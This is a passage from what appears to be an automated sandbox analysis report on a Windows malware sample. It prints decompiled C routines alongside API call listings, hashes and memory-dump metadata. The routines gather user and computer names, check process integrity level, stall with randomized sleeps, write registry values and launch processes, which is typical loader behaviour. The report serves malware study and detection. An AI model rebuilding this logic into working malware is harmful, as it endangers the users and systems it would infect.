                                								_t19 = _t76 + 0x461b53a; // 0x697a6f4d
                                								_t73 = _t19;
                                								wsprintfA(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0x46192a7);
                                							}
                                							__eflags = _t84;
                                							if(_t84 == 0) {
                                								asm("sbb eax, eax");
                                								E04614454( ~_v8 &  *0x461a2c8, 0x461a00c); // executed
                                								_t84 = E04612206(_t73);
                                								__eflags = _t84;
                                								if(_t84 != 0) {
                                									goto L31;
                                								}
                                								_t48 = E04611376();
                                								__eflags = _t48;
                                								if(_t48 != 0) {
                                									__eflags = _v8;
                                									_t82 = _v12;
                                									if(_v8 != 0) {
                                										L30:
                                										_t49 = E04612022(_t79, _t82, _v8); // executed
                                										_t84 = _t49;
                                										goto L31;
                                									}
                                									__eflags = _t82;
                                									if(__eflags == 0) {
                                										goto L31;
                                									}
                                									_t23 = _t82 + 4; // 0x5
                                									_t84 = E04612439(__eflags, _t23);
                                									__eflags = _t84;
                                									if(_t84 == 0) {
                                										goto L31;
                                									}
                                									goto L30;
                                								}
                                								_t84 = 8;
                                							}
                                						}
                                					} else {
                                						_t71 = _v12;
                                						if(_t71 == 0) {
                                							L31:
                                							if(_v20 == 0 || _v20 == 1) {
                                								 *0x461a14c();
                                							}
                                							goto L35;
                                						}
                                						_t72 = _t71 + 4;
                                						do {
                                							_push(1);
                                							_push(_t72);
                                							_t67 = 5;
                                						} while (E04616BE1(_t67, 0) == 0x4c7);
                                					}
                                					goto L31;
                                				} else {
                                					_t84 = _t28;
                                					L35:
                                					return _t84;
                                				}
                                			}







































                                APIs
                                  • Part of subcall function 046158F8: GetModuleHandleA.KERNEL32(4C44544E,00000000,0461540B,00000000,00000000,00000000,?,?,?,?,?,04616BD8,?,00000001), ref: 04615907
                                • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,0461A2FC,00000000), ref: 04615476
                                • CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,?,?,?,04616BD8,?,00000001), ref: 0461548F
                                • wsprintfA.USER32 ref: 0461550F
                                • memset.NTDLL ref: 0461553F
                                • RtlInitializeCriticalSection.NTDLL(053C95F0), ref: 04615550
                                • RtlAllocateHeap.NTDLL(00000008,00000043,00000060), ref: 04615579
                                • wsprintfA.USER32 ref: 046155A9
                                  • Part of subcall function 04614454: GetUserNameW.ADVAPI32(00000000,046155CE), ref: 0461448B
                                  • Part of subcall function 04614454: RtlAllocateHeap.NTDLL(00000000,046155CE), ref: 046144A2
                                  • Part of subcall function 04614454: GetUserNameW.ADVAPI32(00000000,046155CE), ref: 046144AF
                                  • Part of subcall function 04614454: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,046155CE,?,?,?,?,?,04616BD8,?,00000001), ref: 046144D0
                                  • Part of subcall function 04614454: GetComputerNameW.KERNEL32(00000000,00000000), ref: 046144F7
                                  • Part of subcall function 04614454: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0461450B
                                  • Part of subcall function 04614454: GetComputerNameW.KERNEL32(00000000,00000000), ref: 04614518
                                  • Part of subcall function 04614454: HeapFree.KERNEL32(00000000,00000000), ref: 04614536
                                  • Part of subcall function 04616837: RtlAllocateHeap.NTDLL(00000000,00000000,04614197), ref: 04616843
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: Heap$AllocateName$ComputerDescriptorFreeHandleSecurityUserwsprintf$CloseConvertCriticalInitializeModuleSectionStringmemset
                                • String ID:
                                • API String ID: 2910951584-0
                                • Opcode ID: 3039eb8453fcad7ed8e338111d07c69dc95e822072e714d1e5a00fc8e7efdbf3
                                • Instruction ID: 4677e4790d622daa7e16563a324faec4c5d21a0ddea463348ff17e76a0f5d9d1
                                • Opcode Fuzzy Hash: 3039eb8453fcad7ed8e338111d07c69dc95e822072e714d1e5a00fc8e7efdbf3
                                • Instruction Fuzzy Hash: 6551C371A01225ABEB11DFA4D844BAEB3B8EB84755F1C0116E806E7270FB78FD40CB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E0461113D(long* _a4) {
                                				long _v8;
                                				void* _v12;
                                				void _v16;
                                				long _v20;
                                				int _t33;
                                				void* _t46;
                                
                                				_v16 = 1;
                                				_v20 = 0x2000;
                                				if( *0x461a2b4 > 5) {
                                					_v16 = 0;
                                					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                						_v8 = 0;
                                						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                						if(_v8 != 0) {
                                							_t46 = E04616837(_v8);
                                							if(_t46 != 0) {
                                								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                								if(_t33 != 0) {
                                									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                								}
                                								E046150CA(_t46);
                                							}
                                						}
                                						CloseHandle(_v12);
                                					}
                                				}
                                				 *_a4 = _v20;
                                				return _v16;
                                			}










                                APIs
                                • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 0461116F
                                • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,00000000,00000000), ref: 0461118F
                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 0461119F
                                • CloseHandle.KERNEL32(00000000), ref: 046111EF
                                  • Part of subcall function 04616837: RtlAllocateHeap.NTDLL(00000000,00000000,04614197), ref: 04616843
                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?), ref: 046111C2
                                • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 046111CA
                                • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 046111DA
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                • String ID:
                                • API String ID: 1295030180-0
                                • Opcode ID: 98fa92c3defa8bbc4e069b501777553bbc2aa31abddac34c5dbf4dd010b94dba
                                • Instruction ID: 2f8fe4fb4528c4572d00f59f5a535a2b67a6a0732bb58f05c2e3cefc8a7af316
                                • Opcode Fuzzy Hash: 98fa92c3defa8bbc4e069b501777553bbc2aa31abddac34c5dbf4dd010b94dba
                                • Instruction Fuzzy Hash: CF215C75900209FFEB019FD1CC44EEEBBB8EB09304F0440A6E611A6261E7759F44EB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 73%
                                			E04616B0F(signed int __edx, intOrPtr _a4) {
                                				struct _FILETIME _v12;
                                				char _v32;
                                				long _v40;
                                				void* _t14;
                                				void* _t16;
                                				int _t18;
                                				signed int _t20;
                                				void* _t22;
                                				signed int _t23;
                                				intOrPtr _t25;
                                				unsigned int _t29;
                                				signed int _t33;
                                				signed int _t40;
                                
                                				_t33 = __edx;
                                				_t14 = HeapCreate(0, 0x400000, 0); // executed
                                				 *0x461a290 = _t14;
                                				if(_t14 != 0) {
                                					 *0x461a180 = GetTickCount();
                                					_t16 = E04614C1B(_a4);
                                					if(_t16 != 0) {
                                						L10:
                                						return _t16;
                                					} else {
                                						goto L3;
                                					}
                                					do {
                                						L3:
                                						GetSystemTimeAsFileTime( &_v12);
                                						_t18 = SwitchToThread();
                                						_t29 = _v12.dwHighDateTime;
                                						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 7;
                                						_push(0);
                                						_push(9);
                                						_push(_t29 >> 7);
                                						_push(_t20);
                                						L04617EEA();
                                						_t40 = _t18 + _t20;
                                						_t22 = E0461414A(_a4, _t40);
                                						_t23 = 2;
                                						Sleep(_t23 << _t40); // executed
                                					} while (_t22 == 1);
                                					_t25 =  *0x461a2ac; // 0x300
                                					_v32 = 0;
                                					if(_t25 != 0) {
                                						__imp__(_t25,  &_v32);
                                						if(_t25 == 0) {
                                							_v40 = 0;
                                						}
                                						if(_v40 != 0) {
                                							 *0x461a2b8 = 1; // executed
                                						}
                                					}
                                					_t16 = E046153F2(_t33); // executed
                                					goto L10;
                                				}
                                				_t16 = 8;
                                				goto L10;
                                			}

















                                APIs
                                • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 04616B24
                                • GetTickCount.KERNEL32 ref: 04616B3B
                                • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 04616B5B
                                • SwitchToThread.KERNEL32(?,00000001), ref: 04616B61
                                • _aullrem.NTDLL(?,?,00000009,00000000), ref: 04616B7D
                                • Sleep.KERNELBASE(00000002,00000000,?,00000001), ref: 04616B97
                                • IsWow64Process.KERNEL32(00000300,?,?,00000001), ref: 04616BB5
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
                                • String ID:
                                • API String ID: 3690864001-0
                                • Opcode ID: eca25aa6b40d3a1b267fcf326e6780a5c4198851d6f46b3a744441c5f12d58c9
                                • Instruction ID: 80e67bb455a7ca6aef846ca00f06c00c3baa0f2066752c9c4ded0a6a96ca163e
                                • Opcode Fuzzy Hash: eca25aa6b40d3a1b267fcf326e6780a5c4198851d6f46b3a744441c5f12d58c9
                                • Instruction Fuzzy Hash: B421E7B2A04214AFD7109FB4D899E6A77E8E744355F0C492EF509C7260F778EC08CB61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 64%
                                			E0461624D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                				intOrPtr _v8;
                                				intOrPtr _t9;
                                				intOrPtr _t13;
                                				char* _t19;
                                				char* _t28;
                                				void* _t33;
                                				void* _t34;
                                				char* _t36;
                                				void* _t38;
                                				intOrPtr* _t39;
                                				char* _t40;
                                				char* _t42;
                                				char* _t43;
                                
                                				_t34 = __edx;
                                				_push(__ecx);
                                				_t9 =  *0x461a2d4; // 0xdad5a8
                                				_t1 = _t9 + 0x461b60c; // 0x253d7325
                                				_t36 = 0;
                                				_t28 = E0461278C(__ecx, _t1);
                                				if(_t28 != 0) {
                                					_t39 = __imp__;
                                					_t13 =  *_t39(_t28, _t38);
                                					_v8 = _t13;
                                					_t6 =  *_t39(_a4) + 1; // 0x53c9631
                                					_t40 = E04616837(_v8 + _t6);
                                					if(_t40 != 0) {
                                						strcpy(_t40, _t28);
                                						_pop(_t33);
                                						__imp__(_t40, _a4);
                                						_t19 = E046149FE(_t33, _t34, _t40, _a8); // executed
                                						_t36 = _t19;
                                						E046150CA(_t40);
                                						_t42 = E04617565(StrTrimA(_t36, "="), _t36);
                                						if(_t42 != 0) {
                                							E046150CA(_t36);
                                							_t36 = _t42;
                                						}
                                						_t43 = E046152E5(_t36, _t33);
                                						if(_t43 != 0) {
                                							E046150CA(_t36);
                                							_t36 = _t43;
                                						}
                                					}
                                					E046150CA(_t28);
                                				}
                                				return _t36;
                                			}

















                                APIs
                                  • Part of subcall function 0461278C: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04616266,253D7325,00000000,00000000,?,00000000,046170D9), ref: 046127F3
                                  • Part of subcall function 0461278C: sprintf.NTDLL ref: 04612814
                                • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,046170D9,00000000,053C9630), ref: 04616278
                                • lstrlen.KERNEL32(00000000,?,00000000,046170D9,00000000,053C9630), ref: 04616280
                                  • Part of subcall function 04616837: RtlAllocateHeap.NTDLL(00000000,00000000,04614197), ref: 04616843
                                • strcpy.NTDLL ref: 04616297
                                • lstrcat.KERNEL32(00000000,00000000), ref: 046162A2
                                  • Part of subcall function 046149FE: lstrlen.KERNEL32(00000000,00000000,046170D9,00000000,?,046162B1,00000000,046170D9,?,00000000,046170D9,00000000,053C9630), ref: 04614A0F
                                  • Part of subcall function 046150CA: RtlFreeHeap.NTDLL(00000000,00000000,04614239,00000000,00000001,?,00000000,?,?,?,04616B8D,00000000,?,00000001), ref: 046150D6
                                • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,046170D9,?,00000000,046170D9,00000000,053C9630), ref: 046162BF
                                  • Part of subcall function 04617565: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,046162CB,00000000,?,00000000,046170D9,00000000,053C9630), ref: 0461756F
                                  • Part of subcall function 04617565: _snprintf.NTDLL ref: 046175CD
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                • String ID: =
                                • API String ID: 2864389247-1428090586
                                • Opcode ID: df3c0011f6cd91c2a7f1df9ad673960e012a6ae413207d4b56ce0dd9ea4c481c
                                • Instruction ID: 937221efc8403f334fa0b43fea4fdf4e051b04017bb0dd015697ce334a6591d8
                                • Opcode Fuzzy Hash: df3c0011f6cd91c2a7f1df9ad673960e012a6ae413207d4b56ce0dd9ea4c481c
                                • Instruction Fuzzy Hash: 5711E077A01225775712ABB88C44C6E76ADDF85A2930D405AF901E7220FF78EC0287E8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SysAllocString.OLEAUT32(00000000), ref: 0461165B
                                • IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,00000000), ref: 046116DD
                                • StrStrIW.SHLWAPI(00000000,006E0069), ref: 0461171C
                                • SysFreeString.OLEAUT32(00000000), ref: 0461173E
                                  • Part of subcall function 04616C6D: SysAllocString.OLEAUT32(046192B0), ref: 04616CBD
                                • SafeArrayDestroy.OLEAUT32(?), ref: 04611792
                                • SysFreeString.OLEAUT32(?), ref: 046117A0
                                  • Part of subcall function 04611FC2: Sleep.KERNELBASE(000001F4), ref: 0461200A
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                                • String ID:
                                • API String ID: 2118684380-0
                                • Opcode ID: a82bab1c6ff5a3cd55feb7b18490a54bc3abdfe69a0dd887ec083511b56f50be
                                • Instruction ID: cdacfe9a1cfe08788aa92743df701b704209cdda693743313c8258bcc3968fc3
                                • Opcode Fuzzy Hash: a82bab1c6ff5a3cd55feb7b18490a54bc3abdfe69a0dd887ec083511b56f50be
                                • Instruction Fuzzy Hash: 17510176900649EFDB10DFE8C8848EEB7B6FF89344B198869E605DB320E735AD45CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 04611206: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,053C89A0,04612932,?,?,?,?,?,?,?,?,?,?,?,04612932), ref: 046112D2
                                  • Part of subcall function 046143C0: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 046143FD
                                  • Part of subcall function 046143C0: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 0461442E
                                • SysAllocString.OLEAUT32(?), ref: 0461295E
                                • SysAllocString.OLEAUT32(0070006F), ref: 04612972
                                • SysAllocString.OLEAUT32(00000000), ref: 04612984
                                • SysFreeString.OLEAUT32(00000000), ref: 046129E8
                                • SysFreeString.OLEAUT32(00000000), ref: 046129F7
                                • SysFreeString.OLEAUT32(00000000), ref: 04612A02
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
                                • String ID:
                                • API String ID: 2831207796-0
                                • Opcode ID: 8ef72084d9e1c3644c101e83c25a27a6d13cf1d7fa8f2029d12fddf27be1cd21
                                • Instruction ID: 1eb8127c0235603903119e900f73f5fc15fb509b1555eafe17a1e69e43f1c359
                                • Opcode Fuzzy Hash: 8ef72084d9e1c3644c101e83c25a27a6d13cf1d7fa8f2029d12fddf27be1cd21
                                • Instruction Fuzzy Hash: D5315E32D00609AFDB01DFADD844A9FB7B6AF49311F18446AED10FB220EB75AD05CB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 88%
                                			E04611D57(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                				signed int _v8;
                                				char _v12;
                                				signed int* _v16;
                                				char _v284;
                                				void* __esi;
                                				char* _t59;
                                				intOrPtr* _t60;
                                				void* _t62;
                                				intOrPtr _t64;
                                				char _t65;
                                				void* _t67;
                                				intOrPtr _t68;
                                				intOrPtr _t69;
                                				intOrPtr _t71;
                                				void* _t73;
                                				signed int _t81;
                                				void* _t91;
                                				void* _t92;
                                				char _t98;
                                				signed int* _t100;
                                				intOrPtr* _t101;
                                				void* _t102;
                                
                                				_t92 = __ecx;
                                				_v8 = _v8 & 0x00000000;
                                				_t98 = _a16;
                                				if(_t98 == 0) {
                                					__imp__( &_v284,  *0x461a38c);
                                					_t91 = 0x80000002;
                                					L6:
                                					_t59 = E04614AA6( &_v284,  &_v284);
                                					_a8 = _t59;
                                					if(_t59 == 0) {
                                						_v8 = 8;
                                						L29:
                                						_t60 = _a20;
                                						if(_t60 != 0) {
                                							 *_t60 =  *_t60 + 1;
                                						}
                                						return _v8;
                                					}
                                					_t101 = _a24;
                                					_t62 = E04617702(_t92, _t97, _t101, _t91, _t59); // executed
                                					if(_t62 != 0) {
                                						L27:
                                						E046150CA(_a8);
                                						goto L29;
                                					}
                                					_t64 =  *0x461a2cc; // 0x53c9c98
                                					_t16 = _t64 + 0xc; // 0x53c9d8c
                                					_t65 = E04614AA6(_t64,  *_t16);
                                					_a24 = _t65;
                                					if(_t65 == 0) {
                                						L14:
                                						_t29 = _t101 + 0x14; // 0x102
                                						_t33 = _t101 + 0x10; // 0x3d046190, executed
                                						_t67 = E04615F2A(_t97,  *_t33, _t91, _a8,  *0x461a384,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))); // executed
                                						if(_t67 == 0) {
                                							_t68 =  *0x461a2d4; // 0xdad5a8
                                							if(_t98 == 0) {
                                								_t35 = _t68 + 0x461b9e0; // 0x4d4c4b48
                                								_t69 = _t35;
                                							} else {
                                								_t34 = _t68 + 0x461b9db; // 0x55434b48
                                								_t69 = _t34;
                                							}
                                							if(E04615927(_t69,  *0x461a384,  *0x461a388,  &_a24,  &_a16) == 0) {
                                								if(_t98 == 0) {
                                									_t71 =  *0x461a2d4; // 0xdad5a8
                                									_t44 = _t71 + 0x461b86a; // 0x74666f53
                                									_t73 = E04614AA6(_t44, _t44);
                                									_t99 = _t73;
                                									if(_t73 == 0) {
                                										_v8 = 8;
                                									} else {
                                										_t47 = _t101 + 0x10; // 0x3d046190
                                										E04611F7A( *_t47, _t91, _a8,  *0x461a388, _a24);
                                										_t49 = _t101 + 0x10; // 0x3d046190
                                										E04611F7A( *_t49, _t91, _t99,  *0x461a380, _a16);
                                										E046150CA(_t99);
                                									}
                                								} else {
                                									_t40 = _t101 + 0x10; // 0x3d046190, executed
                                									E04611F7A( *_t40, _t91, _a8,  *0x461a388, _a24); // executed
                                									_t43 = _t101 + 0x10; // 0x3d046190
                                									E04611F7A( *_t43, _t91, _a8,  *0x461a380, _a16);
                                								}
                                								if( *_t101 != 0) {
                                									E046150CA(_a24);
                                								} else {
                                									 *_t101 = _a16;
                                								}
                                							}
                                						}
                                						goto L27;
                                					}
                                					_t21 = _t101 + 0x10; // 0x3d046190, executed
                                					_t81 = E04616A36( *_t21, _t91, _a8, _t65,  &_v16,  &_v12); // executed
                                					if(_t81 == 0) {
                                						_t100 = _v16;
                                						if(_v12 == 0x28) {
                                							 *_t100 =  *_t100 & _t81;
                                							_t26 = _t101 + 0x10; // 0x3d046190
                                							E04615F2A(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                                						}
                                						E046150CA(_t100);
                                						_t98 = _a16;
                                					}
                                					E046150CA(_a24);
                                					goto L14;
                                				}
                                				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                					goto L29;
                                				} else {
                                					_t97 = _a8;
                                					E046177A4(_t98, _a8,  &_v284);
                                					__imp__(_t102 + _t98 - 0x117,  *0x461a38c);
                                					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                                					_t91 = 0x80000003;
                                					goto L6;
                                				}
                                			}

                                APIs
                                • StrChrA.SHLWAPI(046130C2,0000005F,00000000,00000000,00000104), ref: 04611D8A
                                • lstrcpy.KERNEL32(?,?), ref: 04611DB7
                                  • Part of subcall function 04614AA6: lstrlen.KERNEL32(?,00000000,053C9C98,74ECC740,046113D0,053C9E9D,046155DE,046155DE,?,046155DE,?,63699BC3,E8FA7DD7,00000000), ref: 04614AAD
                                  • Part of subcall function 04614AA6: mbstowcs.NTDLL ref: 04614AD6
                                  • Part of subcall function 04614AA6: memset.NTDLL ref: 04614AE8
                                  • Part of subcall function 04611F7A: lstrlenW.KERNEL32(?,?,?,04611F20,3D046190,80000002,046130C2,04614106,74666F53,4D4C4B48,04614106,?,3D046190,80000002,046130C2,?), ref: 04611F9F
                                  • Part of subcall function 046150CA: RtlFreeHeap.NTDLL(00000000,00000000,04614239,00000000,00000001,?,00000000,?,?,?,04616B8D,00000000,?,00000001), ref: 046150D6
                                • lstrcpy.KERNEL32(?,00000000), ref: 04611DD9
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                • String ID: ($\
                                • API String ID: 3924217599-1512714803
                                • Opcode ID: c9e3f5b5c33008be7521e058ede4a56fe4d4cd2916ed8cf7050b686a9c3a9854
                                • Instruction ID: 3e90b55e0365534e5de4dee5e955d431f6730edb3ce1de11ba62fa084ef966d0
                                • Opcode Fuzzy Hash: c9e3f5b5c33008be7521e058ede4a56fe4d4cd2916ed8cf7050b686a9c3a9854
                                • Instruction Fuzzy Hash: DA51387210020ABFDF219FA0DD40EEA7BB9EF5A314F08851AFA1592170F735E925EB14
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 32%
                                			E04616BE1(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
                                				intOrPtr _v36;
                                				intOrPtr _v44;
                                				intOrPtr _v48;
                                				intOrPtr _v52;
                                				void _v60;
                                				char _v64;
                                				long _t18;
                                				intOrPtr _t22;
                                				intOrPtr _t23;
                                				long _t29;
                                				intOrPtr _t30;
                                				intOrPtr _t31;
                                				intOrPtr* _t32;
                                
                                				_t30 = __edi;
                                				_t29 = _a4;
                                				_t31 = __eax;
                                				_t18 = E04612902(_t29, __edi, __eax); // executed
                                				_a4 = _t18;
                                				if(_t18 != 0) {
                                					memset( &_v60, 0, 0x38);
                                					_t22 =  *0x461a2d4; // 0xdad5a8
                                					_v64 = 0x3c;
                                					if(_a8 == 0) {
                                						_t7 = _t22 + 0x461b4c8; // 0x70006f
                                						_t23 = _t7;
                                					} else {
                                						_t6 = _t22 + 0x461b8f8; // 0x750072
                                						_t23 = _t6;
                                					}
                                					_v36 = _t31;
                                					_t32 = __imp__;
                                					_v52 = _t23;
                                					_v48 = _t29;
                                					_v44 = _t30;
                                					 *_t32(0);
                                					_push( &_v64);
                                					if( *0x461a100() != 0) {
                                						_a4 = _a4 & 0x00000000;
                                					} else {
                                						_a4 = GetLastError();
                                					}
                                					 *_t32(1);
                                				}
                                				return _a4;
                                			}

                                APIs
                                  • Part of subcall function 04612902: SysAllocString.OLEAUT32(?), ref: 0461295E
                                  • Part of subcall function 04612902: SysAllocString.OLEAUT32(0070006F), ref: 04612972
                                  • Part of subcall function 04612902: SysAllocString.OLEAUT32(00000000), ref: 04612984
                                  • Part of subcall function 04612902: SysFreeString.OLEAUT32(00000000), ref: 046129E8
                                • memset.NTDLL ref: 04616C05
                                • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 04616C41
                                • GetLastError.KERNEL32 ref: 04616C51
                                • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 04616C62
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
                                • String ID: <
                                • API String ID: 593937197-4251816714
                                • Opcode ID: ee9420ca986949f3f3ff5fcba2ed1cd2d367254f3a3aed919319936f6d89f97d
                                • Instruction ID: d5dfc9d2af9885e4202a22ecc16314f8bb962dc6329e63998ebc7dc3d47eeed8
                                • Opcode Fuzzy Hash: ee9420ca986949f3f3ff5fcba2ed1cd2d367254f3a3aed919319936f6d89f97d
                                • Instruction Fuzzy Hash: EC113CB5A00358AFDB00DFA5D885BD97BB8EB08790F08801AE905E7260F774E544CBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E046173C3(signed int _a4, signed int* _a8) {
                                				void* __ecx;
                                				void* __edi;
                                				signed int _t6;
                                				intOrPtr _t8;
                                				intOrPtr _t12;
                                				void* _t18;
                                				long _t21;
                                				void* _t25;
                                				void* _t26;
                                				signed int* _t27;
                                				signed short* _t28;
                                				CHAR* _t30;
                                				long _t31;
                                				WCHAR** _t32;
                                
                                				_t6 =  *0x461a2c8; // 0xbd092303
                                				_t32 = _a4;
                                				_a4 = _t6 ^ 0xd05b5869;
                                				_t8 =  *0x461a2d4; // 0xdad5a8
                                				_t3 = _t8 + 0x461b8a2; // 0x61636f4c
                                				_t25 = 0;
                                				_t30 = E04612DEA(_t3, 1);
                                				if(_t30 != 0) {
                                					_t25 = CreateEventA(0x461a2f8, 1, 0, _t30);
                                					E046150CA(_t30);
                                				}
                                				_t12 =  *0x461a2b4; // 0x4000000a
                                				if(_t12 != 6 || _t12 < 2) {
                                					if( *_t32 == 0) {
                                						goto L11;
                                					}
                                					_t18 = E0461513E(); // executed
                                					if(_t18 != 0) {
                                						goto L11;
                                					}
                                					_t28 = StrChrW( *_t32, 0x20);
                                					if(_t28 != 0) {
                                						 *_t28 =  *_t28 & 0x00000000;
                                						_t28 =  &(_t28[1]);
                                					}
                                					_t21 = E04616BE1(0, _t28,  *_t32, 0); // executed
                                					_t31 = _t21;
                                					if(_t31 == 0) {
                                						if(_t25 == 0) {
                                							goto L21;
                                						}
                                						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                						if(_t31 == 0) {
                                							goto L19;
                                						}
                                					}
                                					goto L11;
                                				} else {
                                					L11:
                                					_t27 = _a8;
                                					if(_t27 != 0) {
                                						 *_t27 =  *_t27 | 0x00000001;
                                					}
                                					_t31 = E046151A8(_t32, _t26);
                                					if(_t31 == 0 && _t25 != 0) {
